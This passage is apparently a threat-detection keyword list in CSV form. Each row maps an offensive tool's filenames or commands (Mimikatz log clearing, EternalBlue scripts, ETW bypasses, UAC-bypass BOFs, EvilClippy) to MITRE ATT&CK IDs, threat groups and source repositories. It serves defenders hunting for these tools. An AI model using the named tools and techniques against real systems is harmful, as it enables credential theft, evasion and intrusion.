intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z
-*EternalBlue.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*eternalblue.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*Eternalblue-Doublepulsar*,offensive_tool_keyword,Eternalblue-Doublepulsar-Metasploit,doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. 
[11],T1055 - T1043 - T1218,TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit,1,1,N/A,N/A,10,1055,545,2021-03-31T09:44:10Z,2017-04-24T12:41:56Z
-*EternalHushFramework-*-SNAPSHOT.jar*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z
-*EternalHushFramework-main*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z
-*EternalHushMain.java*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z
-*EternalHushWindow.java*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z
-*ethereum2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*etw-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*ETWEventSubscription*Program.cs*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*ETWEventSubscription.exe* -ProcStart *,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*ETWEventSubscription.exe* -UserLogon*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*etw-fuck.exe *,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z
-*EtwHash.exe*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z
-*EtwHash.git*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z
-*ETWHash.sln*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z
-*etwti-hook.*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team 
and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*evasion/has_recycle_bin.*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*evasion_shellcode.js*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*event::clear*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z
-*event::drop*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z
-*EventAggregation.dll.bak*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z
-*EventAggregation.dll.bak*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z
-*EventAggregation.dll.patched*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z
-*EventAggregationPH.dll*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential 
Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z
-*eventlog -risk-i-know*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-*eventlog_fucker.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-*eventspy.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z
-*EventSub-Aggressor.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z
-*EventViewerRCE.ps1*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z
-*EventViewerUAC.*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z
-*EventViewerUAC.*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,1,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*EventViewerUAC.x64*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*EventViewerUAC.x86*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*EventViewerUAC_BOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,1,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*eventvwr_elevator*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*-EventVwrBypass*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*evilclippy *,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*EvilClippy.exe*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*EvilClippy.exe*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - 
